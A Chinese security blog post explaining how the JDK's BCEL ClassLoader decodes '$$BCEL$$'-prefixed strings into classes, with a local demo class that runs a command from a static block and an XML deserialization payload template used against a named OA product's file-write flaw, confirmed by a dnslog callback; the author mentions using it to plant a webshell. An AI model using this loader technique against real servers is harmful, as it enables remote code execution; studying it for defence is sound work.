BCEL ClassLoader

已于 2023-01-13 11:36:40 修改
阅读量9k 收藏
点赞数 5
分类专栏: Java安全 文章标签: java 安全
于 2021-12-12 00:46:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xd_2021/article/details/121878806
版权

目录

前言

在复现漏洞时,反弹shell始终不成功,后来在一位大佬帖子下看到了这个方法进行写webshell,最终使用蚁剑连接,上线,出于好奇,就自己学习了下,这篇文章主要讲解BCEL

BCEL是什么

BCEL原本是Apache Jakarta的一个子项目,后来成为了Apache Commons的一个子项目。Apache Commons Collections想必大家都知道,就是常说的CC链,也是Apache Commons的一个子项目

BCEL主要用于分析、创建、操纵Java class文件,包含在原生原生JDK中(com.sun.org.apache.bcel),之所以包含在原生JDK主要原因可能是为了支撑Java XML的一些功能,Java XML功能包含了JAXP(Java API for XML Processing)规范,Java中自带的JAXP实现使用了Apache Xerces和Apache Xalan,Apache Xalan又依赖了BCEL,所以BCEL也被放入了标准库中。

Apache Xalan实现了其中XSLT相关的部分,其中包括xsltc compiler。

XSLTC Compiler就是一个命令行编译器,可以将一个xsl文件编译成一个class文件或jar文件,编译后的class被称为translet,可以在后续用于对XML文件的转换。其实就将XSLT的功能转化成了Java代码,优化执行的速度,如果我们不使用这个命令行编译器进行编译,Java内部也会在运行过程中存在编译的过程。

因为需要编译文件,实际上是动态生成Java字节码,BCEL正是一个Java处理字节码的库,所以Apache Xalan又依赖了BCEL

CalssLoader使用

重点:千万不要使用Java8,会出现异常,可能无法看到弹窗,建议使用Java7或者6

现在我们来看BCEL包中的com.sun.org.apache.bcel.internal.util.ClassLoader类,它是一个ClassLoader,但是他重写了Java内置的ClassLoader#loadClass()方法。

我自己随便写了一个字符串$$BCEL$$xd,作为ClassLoader类下loadClass函数的参数,在跟踪到loadClass方法
在这里插入图片描述
发现loadClass方法里面在判断有无$$BCEL$$xd字符串,接下来我们跟进到createClass方法里面
在这里插入图片描述
发现获该方法获取了$$BCEL$$xd字符串后面的字符并对其进行解码
在这里插入图片描述
我们写一个恶意类(exp),在主函数里定义一个字符串为$$BCEL$$,然后对exp类进行BCEL编码结果拼接到字符串,最后使用loadClass,并对其构建对象

//exp.java
public class exp {

    static {
        try {
            Runtime.getRuntime().exec("notepad");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}



public class main {

    public static void main(String[] args) throws Exception {
        JavaClass javaclass = Repository.lookupClass(exp.class);
        String str = "$$BCEL$$";
        str += Utility.encode(javaclass.getBytes(), true);
        new ClassLoader().loadClass(str).newInstance();
    }

}

最后也是成功弹出了记事本
在这里插入图片描述

根据前面代码我们可以看出,查找$$BCEL$$字符串位置,并跳过该字符串截取到末尾,也就是说不一定开头是$$BCEL$$,但是这个字符串后面必须是编码后的字符串,现在尝试xd$$BCEL$$拼接上exp类进行编码后的字符串,结果也是很美妙,弹出了记事本

在这里插入图片描述

BCEL利用

这里以蓝凌OA的任意文件写入漏洞为例,payload为

<java>
<void class="com.sun.org.apache.bcel.internal.util.ClassLoader">
	<void method="loadClass">
		<string>$$BCEL$$......</string>
		<void method="newInstance"></void>
	</void>
</void>
</java>

恶意exp类为请求dnslog
在这里插入图片描述

对exp.java进行编译,source是使用那个版本的编译器对其编译,target指定生成的class文件将保证和哪个版本的虚拟机进行兼容
在这里插入图片描述
使用BCELCode(https://github.com/Xd-tl/BCELCode)对其进行编码
在这里插入图片描述
插入BCEL编码,并发包,刷新dnslog,成功看到目标服务器请求dnslog了
在这里插入图片描述
在这里插入图片描述

总结

至此,使用BCEL本地尝试也是成功了,利用中也是成功了。但是不幸的是Java 8u251版本之后使用会爆异常,原因可能是Java在升级BCEL时,将ClassLoader删除了,所以在本地尝试时千万不要使用8u251以后版本

大家可以关注菜鸡的公众号,有什么好想法也可以让我学习一下,有什么问题可以一块解决,由于二维码违规,下面是base64编码的文字

5b6u5L+h5YWs5LyX5Y+34oCc5a6J5YWo5re35a2Q4oCd77yM5Y+v5Lul55So5b6u5L+h5pCc5LiA5pCc77yM5q2j5Zyo5a6M5ZaE5LitLi4uLi4u

安全混子
关注
专栏目录
Java安全BCEL ClassLoader
「 虚幻私塾」
02-08 1140
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录 Java安全BCEL ClassLoader 写在前面 About BCEL 调试分析 食用姿势 Fuzz反序列化Gadget Fastjson BCEL Payload Thymeleaf SSTI Payload Java安全BCEL ClassL
BCEL ClassLoader去哪了?
离别歌
10-26 1521
com.sun.org.apache.bcel.internal.util.ClassLoader是常常在构造漏洞利用POC时用到的类。但是,我前几天在写《Java安全漫谈》的时候,偶然...
BCEL classloader
Thunderclap的博客
02-06 682
BCEL的全名应该是Apache Commons BCEL,属于Apache Commons项目下的一个子项目。Apache Commons大家应该不陌生,反序列化最著名的利用链就是出自于其另一个子项目——Apache Commons Collections。就这个库的功能来看,其使用面远不及同胞兄弟们,但是他比Commons Collections特殊的一点是,它被包含在了原生的JDK中,位于com.sun.org.apache.bcel
Java安全-动态加载字节码
最新发布
柠檬i的博客
09-07 1422
众所周知,不同平台、不通CPU的计算机指令有差异,但因为Java是一门跨平台的编译型语言,所以这些差异对于上层开发者来说是透明的,上层开发者只需要将自己的代码编译一次,即可运行在不同平台的JVM虚拟机中。
bcel java_BCEL
weixin_30737081的博客
02-13 825
软件简介Byte Code Engineering Library (BCEL),这是Apache Software Foundation 的Jakarta项目的一部分。BCELJava classworking 最广泛使用的一种框架,它可以让您深入 JVM汇编语言进行类操作的细节。BCELJavassist 有不同的处理字节码方法,BCEL在实际的JVM 指令层次上进行操作(BCEL拥有丰...
使用bcel动态创建class
weixin_33858249的博客
04-14 141
Apache的BCEL库,文档很少,例子也很简单。动态构建类的工作,要求的只是并不是熟练使用BCEL类库本身,而是要对java的class结构了解。我对java的pcode也不熟悉,但是我曾经做过大量的.NET的反编译工作,两者类似,所以我用BCEL也不觉得困难。我提供一个例子,这里例子是使用BCEL创建类的实例,而不是使用反射。如下:IFactory.java public interfa...
基于bcel的class动态编译
qq_16590151的专栏
12-05 590
apache bcel动态编译
JAVA字节码操作库 BCEL.7z
07-06
最后,使用`ClassLoader`加载生成的字节码,使其在JVM中生效。 总的来说,BCEL是一个强大的工具,它为Java开发者提供了一种直接操作字节码的途径,极大地扩展了Java编程的可能性。无论是进行代码分析、动态生成还是...
基于java的字节码操作库 BCEL.zip
05-28
5. 加载新字节码:最后,使用`ClassLoader`加载新生成的字节码,使其在程序中生效。 总的来说,BCEL是一个强大而灵活的字节码操作工具,对于那些需要深入底层进行代码操作的Java开发者来说,它是一个不可或缺的库。...
Java ClassLoader与Bytecode深度解析
除了ASM和cglib,还有如Javassist、BCEL等工具,它们提供了一种更友好的API来操作和生成Bytecode,使得开发者可以实现元编程和代码生成等功能。 总结,JavaClassLoader和Bytecode是其动态性和安全性的基石。深入...
bcel.jar包
11-06
bcel.jar的jar包,开发findbugs自定义插件可以用。
bcel-5.2
06-09
bcel-5.2,字节码编辑器。
bcel-6.0 bcel-6.0
08-08
bcel-6.0
apache bcel
12-05
apache bcel
JAVA字节码操作库 BCEL
06-06
JAVA字节码操作库 BCEL
BCEL简明教程
evasnowind的专栏
12-04 5217
注意:本文章主要依据BCEL官方手册进行阐述,大部分内容都是从该手册直接翻译过来的,并做了一定的简化,同时还参考了《深入理解Java虚拟机》(周志明著)。笔者在下面阐述的时候也会给出相应的章节,如果读者有不清楚的地方请参考BCEL官方手册或是BCEL API,以及《深入理解Java虚拟机》。 BCEL是什么? 相信搜索到这篇文章的读者应该知道BCEL是啥,不过还是简要提一下吧:BCEL(...
java classloader
wangjuntytl的专栏
03-04 876
java classloader
bcel_BCEL的字节码工程
cusi77914的博客
06-29 2811
在本系列的最后三篇文章中,我向您展示了如何使用Javassist框架进行类工作。 这次,我将使用Apache字节码工程库(BCEL)来介绍一种非常不同的字节码操作方法。 BCEL在实际的JVM指令级别上运行,这与Javassist支持的源代码接口不同。 当您确实想控制程序执行的每个步骤时,低级方法使BCEL非常有用,但是对于两种情况都可以使用的情况,使用BCEL的工作也比使用Javassist...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全混子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值